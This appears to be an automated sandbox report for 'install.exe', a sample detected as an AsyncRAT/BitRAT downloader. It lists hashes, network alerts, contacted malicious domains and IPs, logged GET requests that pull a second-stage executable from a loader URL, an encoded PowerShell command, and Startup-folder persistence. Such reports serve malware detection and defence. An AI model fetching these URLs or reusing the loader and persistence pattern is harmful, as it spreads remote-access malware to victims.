popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

install.exe

Generic Malware Downloader Antivirus Code injection DGA Escalate priviledges Socket ScreenShot KeyLogger Create Service SMTP Internet API DNS Anti_VM Sniff Audio GIF Format .NET EXE PE32 PE File AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 23, 2022, 11:46 a.m. Oct. 23, 2022, 11:53 a.m.
Size 192.5KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 9628afc9116db52960422b598996d19f
SHA256 453fb1c4b3b48361fa8a67dcedf1eaec39449cb5a146a7770c63d1dc0d7562f0
CRC32 E4A17B32
ssdeep 1536:MYB+R6Hwvj1p3w45pEdhKzocSFeuiS2FIlKXz0PEziNQKjod:VBvwvj1Zw4ghKzocSFeuiS2FIIAwKod
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
ripley.studio
A 107.175.247.199
107.175.247.199
gh9st.mywire.org
A 107.174.212.121
107.174.212.121
IP Address Status Action
107.174.212.121 Active Moloch
107.175.247.199 Active Moloch
164.124.101.2 Active Moloch
199.188.203.151 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 107.175.247.199:80 -> 192.168.56.103:49161 2017962 ET MALWARE PE EXE or DLL Windows file download disguised as ASCII A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49161 2022640 ET MALWARE PE EXE or DLL Windows file download Text M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49161 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 192.168.56.103:49167 -> 107.175.247.199:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49167 -> 107.175.247.199:80 2022550 ET MALWARE Possible Malicious Macro DL EXE Feb 2016 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 192.168.56.103:49177 -> 107.174.212.121:5005 906200095 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (BitRAT) undefined
TCP 107.175.247.199:80 -> 192.168.56.103:49161 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 107.175.247.199:80 -> 192.168.56.103:49167 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.103:49177
107.174.212.121:5005 		CN=GH9ST CN=GH9ST 0e:27:6e:bc:2d:52:a5:8a:4a:31:f1:c9:33:16:53:8b:85:24:af:a7

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003a7b98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003a7b98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003a7c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aa70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031a3b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031abb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031ae30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031b130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031aef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031af70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031af70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00ce1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00ce1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00ce10c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00366ee8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00367028
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00367028
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00367028
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://ripley.studio/loader/uploads/Qanjttrbv.jpeg
suspicious_features Connection to IP address suspicious_request GET http://107.175.247.199/loader/server.exe
request GET http://ripley.studio/loader/uploads/Qanjttrbv.jpeg
request GET http://107.175.247.199/loader/server.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 1179648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00660000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02290000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00572000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00730000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00596000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0059a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0059b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00731000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00738000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00739000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0073e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0078f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00801000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00803000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00804000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00805000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00806000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00807000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00808000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00809000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0080f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0059c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 9930706944
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
cmdline Powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath: Powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath: Powershell
1 1 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
flags: 3
oldfilepath_r: C:\Users\test22\AppData\Local\Temp\\install.exe
newfilepath: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
oldfilepath: C:\Users\test22\AppData\Local\Temp\install.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sun, 23 Oct 2022 02:52:04 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 22 Sep 2022 05:54:20 GMT ETag: "4ac400-5e93db1463b00" Accept-Ranges: bytes Content-Length: 4899840 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@BäïGHüâG¸ ( *.+{*+÷B++ }*+õ+ô( *Ö+ ÀG%Ð+ ++*( +â( +ío +è(+ã0¥,_+x8
received: 1024
socket: 728
1 1024 0

InternetReadFile

